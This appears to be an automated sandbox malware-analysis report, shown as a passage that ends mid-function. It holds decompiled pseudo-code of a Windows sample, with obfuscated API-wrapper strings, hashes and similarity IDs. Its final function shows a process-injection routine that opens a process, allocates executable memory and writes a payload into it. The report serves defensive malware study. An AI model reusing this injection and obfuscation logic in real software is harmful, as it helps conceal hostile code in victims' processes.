                                                          C-Code - Quality: 55%
                                                          			E0045A8C4(void* __eax, void* __ebx, long __ecx, long __edx, void* __edi, void* __esi, long _a4, long _a8) {
				long _v8;
				void* _v12;
				char _v16;
				void* _t21;
				intOrPtr _t33;
				long _t35;
				void* _t37;
				void* _t38;
				void* _t40;

				_v16 = 0;
				_v8 = __ecx;
				_t35 = __edx;
				_t37 = __eax;
				 *[fs:eax] = _t40 + 0xfffffff4;
				L00455C58("cHNUWa66FeSaZa6op7",  &_v16);
				 *0x470f9c( *0x470fa4, E004049DC(_v16),  *[fs:eax], 0x45a934, _t40, __edi, __esi, __ebx, _t38);
				_t21 = MapViewOfFile(_t37, _t35, _v8, _a8, _a4); // executed
				_v12 = _t21;
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x45a93b);
				return E00404500( &_v16);
			}












                                                          0x0045a8cf
                                                          0x0045a8d2
                                                          0x0045a8d5
                                                          0x0045a8d7
                                                          0x0045a8e4
                                                          0x0045a8ef
                                                          0x0045a903
                                                          0x0045a919
                                                          0x0045a91b
                                                          0x0045a920
                                                          0x0045a923
                                                          0x0045a926
                                                          0x0045a933

                                                          APIs
                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000003,00000080,?,00000000,00000000,00000000), ref: 0045A919
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileView
                                                          • String ID: cHNUWa66FeSaZa6op7
                                                          • API String ID: 3314676101-3015465037
                                                          • Opcode ID: 1e16f216c28589431112a383692f0ec3bbbd8aafbd305038ceb900ce17f4e020
                                                          • Instruction ID: 34e40cec5de58d34fb12529f140ec416bcdb10fae9c1e1a080311a28c4f2b234
                                                          • Opcode Fuzzy Hash: 1e16f216c28589431112a383692f0ec3bbbd8aafbd305038ceb900ce17f4e020
                                                          • Instruction Fuzzy Hash: B10162B5900208BF8710DFAADC81C9EBBFCEB8D7147518576F918D3251D6749E108B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045C8BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0045C8BC(void* __eax, void* __ebx, long __ecx, void* __edx, void* __esi, struct _OVERLAPPED* _a4, DWORD* _a8) {
				long _v8;
				char _v12;
				void* _t23;
				intOrPtr _t33;
				void* _t35;
				void* _t36;
				void* _t38;

				_v12 = 0;
				_v8 = __ecx;
				_t35 = __edx;
				_t23 = __eax;
				 *[fs:eax] = _t38 + 0xfffffff8;
				L00455C58("WbnvF0W0=HK6",  &_v12);
				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45c928, _t38, __esi, __ebx, _t36);
				WriteFile(_t23, _t35, _v8, _a8, _a4); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045C92F);
				return E00404500( &_v12);
			}










                                                          0x0045c8c6
                                                          0x0045c8c9
                                                          0x0045c8cc
                                                          0x0045c8ce
                                                          0x0045c8db
                                                          0x0045c8e6
                                                          0x0045c8fa
                                                          0x0045c90e
                                                          0x0045c914
                                                          0x0045c917
                                                          0x0045c91a
                                                          0x0045c927

                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,?,00000000,?,?,?,00000000,00000000), ref: 0045C90E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID: WbnvF0W0=HK6
                                                          • API String ID: 3934441357-551404843
                                                          • Opcode ID: 4a8c0f779c5717f1d83c4ba89df535235c10ec742024155374879a9d00876a7c
                                                          • Instruction ID: ff42bfb428e40931a330ed2f96ba2833be91d5993588f6a0dc2a4f825be25e6c
                                                          • Opcode Fuzzy Hash: 4a8c0f779c5717f1d83c4ba89df535235c10ec742024155374879a9d00876a7c
                                                          • Instruction Fuzzy Hash: 090131B5604708BFC710DFE9DC81C9FBBBCEB8D710B51857AB918D3251E6749E048AA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045C954 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0045C954(void* __eax, void* __ebx, long __ecx, void* __edx, void* __esi, struct _OVERLAPPED* _a4, DWORD* _a8) {
				long _v8;
				char _v12;
				void* _t23;
				intOrPtr _t33;
				void* _t35;
				void* _t36;
				void* _t38;

				_v12 = 0;
				_v8 = __ecx;
				_t35 = __edx;
				_t23 = __eax;
				 *[fs:eax] = _t38 + 0xfffffff8;
				L00455C58("jaWDpipv+0j",  &_v12);
				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45c9c0, _t38, __esi, __ebx, _t36);
				ReadFile(_t23, _t35, _v8, _a8, _a4); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045C9C7);
				return E00404500( &_v12);
			}










                                                          0x0045c95e
                                                          0x0045c961
                                                          0x0045c964
                                                          0x0045c966
                                                          0x0045c973
                                                          0x0045c97e
                                                          0x0045c992
                                                          0x0045c9a6
                                                          0x0045c9ac
                                                          0x0045c9af
                                                          0x0045c9b2
                                                          0x0045c9bf

                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,?,?,?,?,?,?,00000000), ref: 0045C9A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: jaWDpipv+0j
                                                          • API String ID: 2738559852-1846638132
                                                          • Opcode ID: 43d934d9aaf6d74a8968c1d532ba32f02dde4872e49aae3dd77f572958499367
                                                          • Instruction ID: 317acb2a43497871ac41f47ea22c227b77e0205c8cace9b359201ce58d7b2823
                                                          • Opcode Fuzzy Hash: 43d934d9aaf6d74a8968c1d532ba32f02dde4872e49aae3dd77f572958499367
                                                          • Instruction Fuzzy Hash: 820162B5600708BF8710DFA5DC8189EBBBCEB8D710B51817AB908E3251D6745E008AA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045B2E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E0045B2E0(CHAR* __eax, void* __ebx, CHAR* __edx, void* __esi) {
				char _v8;
				CHAR* _t17;
				intOrPtr _t23;
				CHAR* _t25;
				void* _t26;
				intOrPtr _t28;

				_t25 = __edx;
				_t17 = __eax;
				 *[fs:eax] = _t28;
				L00455C58("Za6gpNFv+aZVFei",  &_v8);
				 *0x470f9c( *0x470fa0, E004049DC(_v8),  *[fs:eax], 0x45b337, _t28, __esi, __ebx, 0, _t26);
				FindWindowA(_t17, _t25); // executed
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(0x45b33e);
				return E00404500( &_v8);
			}









                                                          0x0045b2e7
                                                          0x0045b2e9
                                                          0x0045b2f6
                                                          0x0045b301
                                                          0x0045b315
                                                          0x0045b31d
                                                          0x0045b323
                                                          0x0045b326
                                                          0x0045b329
                                                          0x0045b336

                                                          APIs
                                                          • FindWindowA.USER32(00000000,00000000,?,?,00000000,00000000,?,00444C1F,00000000,00444CA2,?,00000000,00000000,00000000,00000000,00000000), ref: 0045B31D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FindWindow
                                                          • String ID: Za6gpNFv+aZVFei
                                                          • API String ID: 134000473-2802009458
                                                          • Opcode ID: 8f42f971a6e24e0ca626ebe53a2c25d9ce4ddc75e48e4f53d82eca1f11e18835
                                                          • Instruction ID: f93d92c4e1972b19d936cb926f0bf2e70785caae9c2f6df26c81e8556f2e0dd0
                                                          • Opcode Fuzzy Hash: 8f42f971a6e24e0ca626ebe53a2c25d9ce4ddc75e48e4f53d82eca1f11e18835
                                                          • Instruction Fuzzy Hash: BBF08271200308BFD711EBA5DC52E5A77ECDB89700B914472F908E3652D7785D04C6A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045ACDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34threadCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E0045ACDC(void* __eax, void* __ebx, DWORD* __edx, void* __esi) {
				char _v8;
				void* _t17;
				intOrPtr _t23;
				DWORD* _t25;
				void* _t26;
				intOrPtr _t28;

				_t25 = __edx;
				_t17 = __eax;
				 *[fs:eax] = _t28;
				L00455C58("ZqWeZ5DvFi8Vp0Wj=Pn6xH7",  &_v8);
				 *0x470f9c( *0x470fa4, E004049DC(_v8),  *[fs:eax], 0x45ad33, _t28, __esi, __ebx, 0, _t26);
				GetExitCodeThread(_t17, _t25); // executed
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E0045AD3A);
				return E00404500( &_v8);
			}









                                                          0x0045ace3
                                                          0x0045ace5
                                                          0x0045acf2
                                                          0x0045acfd
                                                          0x0045ad11
                                                          0x0045ad19
                                                          0x0045ad1f
                                                          0x0045ad22
                                                          0x0045ad25
                                                          0x0045ad32

                                                          APIs
                                                          • GetExitCodeThread.KERNELBASE(00000000,00000014,?,?,00000000,00000000,?,0043B498,00000000,00000014), ref: 0045AD19
                                                          Strings
                                                          • ZqWeZ5DvFi8Vp0Wj=Pn6xH7, xrefs: 0045ACF8
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CodeExitThread
                                                          • String ID: ZqWeZ5DvFi8Vp0Wj=Pn6xH7
                                                          • API String ID: 2886910748-3394517499
                                                          • Opcode ID: 1c8c38b730cb1421216377cf90d2dc43379d84edcd132e6115eaa43bf3057dce
                                                          • Instruction ID: 09357c9e876af73cd3ce9e287685aba195ef0089c119b7784a02ec3ecbf7faa7
                                                          • Opcode Fuzzy Hash: 1c8c38b730cb1421216377cf90d2dc43379d84edcd132e6115eaa43bf3057dce
                                                          • Instruction Fuzzy Hash: E6F02771200304BFC310FBA5EC42E4A77FCDB8D7017514472F908D3652D6BC5E148668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045CDE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E0045CDE8(void* __eax, void* __ebx, struct _WIN32_FIND_DATAA* __edx, void* __esi) {
				char _v8;
				void* _t17;
				intOrPtr _t23;
				struct _WIN32_FIND_DATAA* _t25;
				void* _t26;
				intOrPtr _t28;

				_t25 = __edx;
				_t17 = __eax;
				 *[fs:eax] = _t28;
				L00455C58("Za6gpir6dPZ0=HK677",  &_v8);
				 *0x470f9c( *0x470fa4, E004049DC(_v8),  *[fs:eax], 0x45ce3f, _t28, __esi, __ebx, 0, _t26);
				FindNextFileA(_t17, _t25); // executed
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E0045CE46);
				return E00404500( &_v8);
			}









                                                          0x0045cdef
                                                          0x0045cdf1
                                                          0x0045cdfe
                                                          0x0045ce09
                                                          0x0045ce1d
                                                          0x0045ce25
                                                          0x0045ce2b
                                                          0x0045ce2e
                                                          0x0045ce31
                                                          0x0045ce3e

                                                          APIs
                                                          • FindNextFileA.KERNELBASE(?,?,?,?,?,00000000,?,0045D00A,00000000,004542A4,00000000,004542C1,?,00000000,004542D2), ref: 0045CE25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileFindNext
                                                          • String ID: Za6gpir6dPZ0=HK677
                                                          • API String ID: 2029273394-1461176880
                                                          • Opcode ID: ecda59d43cc8ab3f56adaf209d876e88e3d500ea6742a92cc575044110539022
                                                          • Instruction ID: 7941cc247345e2b3c43151014393218a1d1a67d2f98d7eb6e3d79a8be84706c1
                                                          • Opcode Fuzzy Hash: ecda59d43cc8ab3f56adaf209d876e88e3d500ea6742a92cc575044110539022
                                                          • Instruction Fuzzy Hash: FFF0A771200304BFD711EBA9DC92E5A77ECDB8DB007514472F908D3652D6B86D0486A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00450E88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 47%
                                                          			E00450E88(struct _MEMORYSTATUSEX* __eax, void* __ebx) {
				char _v8;
				struct _MEMORYSTATUSEX* _t19;
				intOrPtr _t24;
				void* _t25;
				intOrPtr _t27;

				_t19 = __eax;
				 *[fs:eax] = _t27;
				L00455C58("ZqKVxaNocHWX+bnrjbZDFPWmZ51",  &_v8);
				 *((intOrPtr*)( *((intOrPtr*)( *0x46ee50))))( *((intOrPtr*)( *0x46eef8)), E004049DC(_v8),  *[fs:eax], 0x450ee0, _t27, __ebx, 0, _t25);
				GlobalMemoryStatusEx(_t19); // executed
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E00450EE7);
				return E00404500( &_v8);
			}








                                                          0x00450e8e
                                                          0x00450e9b
                                                          0x00450ea6
                                                          0x00450ec3
                                                          0x00450ec6
                                                          0x00450ecc
                                                          0x00450ecf
                                                          0x00450ed2
                                                          0x00450edf

                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,00000000,?,00450F33), ref: 00450EC6
                                                          Strings
                                                          • ZqKVxaNocHWX+bnrjbZDFPWmZ51, xrefs: 00450EA1
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: ZqKVxaNocHWX+bnrjbZDFPWmZ51
                                                          • API String ID: 1890195054-4154276380
                                                          • Opcode ID: eb6df32c256fa5173c4180af338f035f3f50cbcb64eb86d7726c16e45bb46104
                                                          • Instruction ID: 585057ed5a55f7e15db7790acfe1761836d21971f10d6cbcedc7dd56703ea3a1
                                                          • Opcode Fuzzy Hash: eb6df32c256fa5173c4180af338f035f3f50cbcb64eb86d7726c16e45bb46104
                                                          • Instruction Fuzzy Hash: 4EF08279300304AFD301EBAADC92E1A73ECE78D700BA10872F904D3652E6B9AE048618
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045BD44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 47%
                                                          			E0045BD44(void* __eax, void* __ebx) {
				char _v8;
				void* _t17;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t25;

				_t17 = __eax;
				 *[fs:eax] = _t25;
				L00455C58("jaWE7qKVhqWRp5u",  &_v8);
				 *0x470f9c( *0x470fa8, E004049DC(_v8),  *[fs:eax], 0x45bd97, _t25, __ebx, 0, _t23);
				RegCloseKey(_t17); // executed
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(0x45bd9e);
				return E00404500( &_v8);
			}








                                                          0x0045bd4a
                                                          0x0045bd57
                                                          0x0045bd62
                                                          0x0045bd76
                                                          0x0045bd7d
                                                          0x0045bd83
                                                          0x0045bd86
                                                          0x0045bd89
                                                          0x0045bd96

                                                          APIs
                                                          • RegCloseKey.KERNELBASE(?,?,?,00000000,?,004551F8,?,00020119,00000000,00455202,?,00000000,00455227), ref: 0045BD7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: jaWE7qKVhqWRp5u
                                                          • API String ID: 3535843008-2917291111
                                                          • Opcode ID: 696099acadcfa8eec699bb912f3cdce7baf85865ff9fcd174422d0eb0d142104
                                                          • Instruction ID: 35908777c7d7221c23bee131b6d42e73951d3790cc5edca30e10c4d6d3ff690d
                                                          • Opcode Fuzzy Hash: 696099acadcfa8eec699bb912f3cdce7baf85865ff9fcd174422d0eb0d142104
                                                          • Instruction Fuzzy Hash: F2F030B1204708BFD711EFA5DC52A5A77FCE789700BA14472FA08D3692D7B85E088668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045AFA4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 47%
                                                          			E0045AFA4(void* __eax, void* __ebx) {
				char _v8;
				void* _t17;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t25;

				_t17 = __eax;
				 *[fs:eax] = _t25;
				L00455C58("7qKVhqWCxHru+0j",  &_v8);
				 *0x470f9c( *0x470fa4, E004049DC(_v8),  *[fs:eax], 0x45aff7, _t25, __ebx, 0, _t23);
				FindCloseChangeNotification(_t17); // executed
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(E0045AFFE);
				return E00404500( &_v8);
			}








                                                          0x0045afaa
                                                          0x0045afb7
                                                          0x0045afc2
                                                          0x0045afd6
                                                          0x0045afdd
                                                          0x0045afe3
                                                          0x0045afe6
                                                          0x0045afe9
                                                          0x0045aff6

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,00000000,?,0045BF49,00000000,00000000,00000003,00000000,00000000,0045BF5F,?,?), ref: 0045AFDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID: 7qKVhqWCxHru+0j
                                                          • API String ID: 2591292051-2582428777
                                                          • Opcode ID: 5f2c1356b070c8aacb78452e960a7298b20d821df9cb130fd0297a7258da2c03
                                                          • Instruction ID: f0b18c6ebe530d154fada0833a763605c112e49c18201790adf74822f65cd892
                                                          • Opcode Fuzzy Hash: 5f2c1356b070c8aacb78452e960a7298b20d821df9cb130fd0297a7258da2c03
                                                          • Instruction Fuzzy Hash: 5BF0A7B1204304AFC711EFA5DC52A1AB7ECD78D700B914472F904D3542D6785D148658
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004286D8 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E004286D8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				void _v44;
				void* _t36;
				void* _t54;
				intOrPtr _t57;
				void* _t71;

				_t54 = __edx;
				_v12 = 0;
				_v16 = 0;
				memcpy( &_v44, __eax, 7 << 2);
				_t65 = _t54;
				_push(_t71);
				_push(0x4287ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xffffffffffffffe4;
				E00404500(_t54);
				if(E004282D0(_v44 & 0x0000ffff) != 0) {
					E00404B0C( &_v12, 0x401);
					E00404B0C( &_v16, 0x20);
					_t36 =  *0x46afb4( &_v44, E004280E4( &_v44), E004049DC(_v12), 0x401, E004049DC(_v16), 0x20, 0xa); // executed
					if(_t36 == 0) {
						E004046F8(_t65, E004049DC(_v12));
					}
				} else {
					_v8 =  *0x46af7c(_v40);
					if(_v8 != 0) {
						E004046F8(_t65, _v8);
					}
				}
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E004287B5);
				return E00404524( &_v16, 2);
			}












                                                          0x004286d8
                                                          0x004286e3
                                                          0x004286e6
                                                          0x004286f3
                                                          0x004286f5
                                                          0x004286f9
                                                          0x004286fa
                                                          0x004286ff
                                                          0x00428702
                                                          0x00428707
                                                          0x00428717
                                                          0x00428746
                                                          0x00428750
                                                          0x00428778
                                                          0x00428780
                                                          0x0042878e
                                                          0x0042878e
                                                          0x00428719
                                                          0x00428722
                                                          0x00428729
                                                          0x00428730
                                                          0x00428730
                                                          0x00428729
                                                          0x00428795
                                                          0x00428798
                                                          0x0042879b
                                                          0x004287ad

                                                          APIs
                                                          • inet_ntoa.WS2_32(?), ref: 0042871C
                                                          • getnameinfo.WS2_32(?,00000000,00000000,00000401,00000000,00000020,0000000A), ref: 00428778
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: getnameinfoinet_ntoa
                                                          • String ID:
                                                          • API String ID: 57870123-0
                                                          • Opcode ID: 8dabe731761d21704c26b085a6a7438e23fc4f56c9dac8f611395db76d809dd6
                                                          • Instruction ID: f5bb0472084a248bae5ac8e42a6c9c91c313b12758310020b3d47fe81e911e79
                                                          • Opcode Fuzzy Hash: 8dabe731761d21704c26b085a6a7438e23fc4f56c9dac8f611395db76d809dd6
                                                          • Instruction Fuzzy Hash: 942198B1B00118ABCB04EBA5DC4169FBBB9EB88314F50447BF900F3291DB7C9D01C659
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00432F84 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00432F84(void* __eax, struct tagPROCESSENTRY32W __edx) {
				int _t4;
				void* _t5;

				_t5 = __eax;
				if(E00432CE8(__eax) == 0) {
					return 0;
				} else {
					_t4 = Process32First(_t5, __edx); // executed
					return _t4;
				}
			}





                                                          0x00432f88
                                                          0x00432f91
                                                          0x00432fa2
                                                          0x00432f93
                                                          0x00432f95
                                                          0x00432f9d
                                                          0x00432f9d

                                                          APIs
                                                          • Process32First.KERNEL32(?,00000128,?,?,00453983), ref: 00432F95
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FirstProcess32
                                                          • String ID:
                                                          • API String ID: 2623510744-0
                                                          • Opcode ID: aececb1c3af206cc55317ab1b9b7d8fc0414ca03778ec0ca5e41acb90fb913f1
                                                          • Instruction ID: 20b995b1d37ce201493aa7a1cfadbeca79977a702a32b96be4c991261812a7db
                                                          • Opcode Fuzzy Hash: aececb1c3af206cc55317ab1b9b7d8fc0414ca03778ec0ca5e41acb90fb913f1
                                                          • Instruction Fuzzy Hash: 7CC08CB32023305B8A1066F93E888C7B78DDE4D1BBB0424B3F50CE3212D2A98C00A2E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00432FA4 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00432FA4(void* __eax, struct tagPROCESSENTRY32W __edx) {
				int _t4;
				void* _t5;

				_t5 = __eax;
				if(E00432CE8(__eax) == 0) {
					return 0;
				} else {
					_t4 = Process32Next(_t5, __edx); // executed
					return _t4;
				}
			}





                                                          0x00432fa8
                                                          0x00432fb1
                                                          0x00432fc2
                                                          0x00432fb3
                                                          0x00432fb5
                                                          0x00432fbd
                                                          0x00432fbd

                                                          APIs
                                                          • Process32Next.KERNEL32(?,00000128,?,?,004539C8), ref: 00432FB5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: NextProcess32
                                                          • String ID:
                                                          • API String ID: 1850201408-0
                                                          • Opcode ID: ce0b27c96ac475c9280fa5255bae305c074b72b8fad56e5601fbc45a0fc0fdf0
                                                          • Instruction ID: 491ff5b1db40d012ad59abe041ee06dba9f8cf6f1abd7662fb82715baaf9d6f5
                                                          • Opcode Fuzzy Hash: ce0b27c96ac475c9280fa5255bae305c074b72b8fad56e5601fbc45a0fc0fdf0
                                                          • Instruction Fuzzy Hash: 8FC08072202220574F1066F53D848C7674DDD4D1F7B041473F509D3111D2594C0051D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00456778 Relevance: 12.9, Strings: 10, Instructions: 396COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E00456778(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, char _a12, char _a16) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v84;
				intOrPtr _v88;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				void* __ecx;
				void* _t138;
				char _t157;
				char _t201;
				char _t213;
				char _t221;
				char _t229;
				void* _t251;
				void* _t271;
				char _t286;
				intOrPtr _t288;
				intOrPtr _t316;
				void* _t341;
				void* _t345;
				void* _t348;
				intOrPtr _t350;
				void* _t351;
				intOrPtr _t353;
				intOrPtr _t354;

				_t349 = __esi;
				_t348 = __edi;
				_t353 = _t354;
				_t288 = 0x1d;
				do {
					_push(0);
					_push(0);
					_t288 = _t288 - 1;
				} while (_t288 != 0);
				_t1 =  &_v8;
				 *_t1 = _t288;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				_t286 = _a16;
				E004049CC(_v8);
				E004049CC(_v12);
				E004049CC(_v16);
				_push(_t353);
				_push(0x456d02);
				_push( *[fs:eax]);
				 *[fs:eax] = _t354;
				_v17 = 0;
				E00404A3C(_v16, 2, 1,  &_v136);
				_push(_v136);
				L00455C58(0x456d20,  &_v140);
				_pop(_t138);
				E00404928(_t138, _v140);
				if(0 == 0) {
					L00455238(8, _t286, 2,  &_v44, __esi);
					L00453BE8(_v16,  &_v48, _v44);
					_push(_v44);
					_push(_v48);
					_push( *((intOrPtr*)( *0x46eeac)));
					E0040489C();
					L00455C58("xmvhF0WXhG",  &_v148);
					__eflags = E0045C584(_v148, _t286);
					if(__eflags == 0) {
						L00455C58("xmvhF0WXhG",  &_v152);
						L0045BCF8(_v152, _t286,  &_v152, __eflags);
					}
					L00455C58("xmvhF0WXhNKD",  &_v156);
					E0045C058(_v156, _t286, _v48, _t348, _t349);
					_t315 =  &_v160;
					L00455C58("xmvhF0WXhNKD",  &_v160);
					_t157 = E0045BF6C(_v160, _t286, _t349);
					__eflags = _t157;
					if(_t157 == 0) {
						goto L45;
					}
					__eflags = _t286;
					if(_t286 == 0) {
						__eflags = _a4;
						if(_a4 == 0) {
							L00449BE4(E00404A34( &_v16), _t286, _a12, _t348, _t349, _a8, 0);
							goto L45;
						}
						_t350 = E0045AA10(0x1f0fff, _t286,  *_a8, 0, _t349);
						L24:
						_v28 = E004560F0(_t286, _t348, _t350, __eflags, _t350, 0, 0x85e, 0x1000, 0x40);
						__eflags = _v28;
						if(__eflags == 0) {
							__eflags = 0;
							_v28 = E0045C79C(_t350, _t286, 0x85e, 0, _t348, _t350, 0x40, 0x1000);
						}
						E004561CC(_t286, _t348, _t350, __eflags, _t350, _v28, 0x46e47d, 0x85e,  &_v32);
						__eflags = _v32 - 0x85c;
						if(_v32 < 0x85c) {
							L0045BA78(_t350, _t286, 0x46e47d, _v28, _t350,  &_v32, 0x85e);
						}
						__eflags = _t286;
						if(_t286 == 0) {
							L40:
							__eflags = 0;
							_t348 = E0045CB08(_t350, _t286, 0, 0, _t350,  &_v40, 0, 0, _v28);
							goto L41;
						} else {
							L00455C58("xq4uRaWkp7",  &_v168);
							E00404928(_v8, _v168);
							if(__eflags != 0) {
								goto L40;
							}
							_v216 = _v24;
